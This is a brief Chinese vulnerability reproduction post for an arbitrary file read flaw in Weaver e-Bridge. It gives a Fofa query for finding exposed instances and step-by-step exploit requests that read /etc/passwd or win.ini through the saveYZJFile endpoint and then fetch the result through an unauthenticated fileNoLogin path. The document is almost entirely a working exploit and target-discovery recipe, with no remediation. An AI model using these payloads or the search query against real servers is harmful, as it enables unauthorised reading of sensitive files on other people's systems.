泛微雲橋e-Bridge-任意檔案讀取漏洞
阿新 • • 發佈:2020-10-10
1.資產查詢
Fofa: title="泛微雲橋 e-Bridge"
2.漏洞描述
泛微雲橋e-Bridge存在任意檔案讀取漏洞,攻擊者成功利用該漏洞,可實現任意檔案讀取,獲取敏感資訊。
3.漏洞復現
1)Linux伺服器
(1)在URL後新增payload
payload:/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt
(2)在URL後新增/file/fileNoLogin/上一步返回的id
payload:/file/fileNoLogin/fa38f21af951482bb450d1ce3e6a7b49
2)Windows伺服器
(1)在URL後新增payload
payload :/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C://windows/win.ini&fileExt=txt
(2)在URL後新增/file/fileNoLogin/上一步返回的id
payload:/file/fileNoLogin/9ecccbde436e4d3d8d34ef63274d4d4d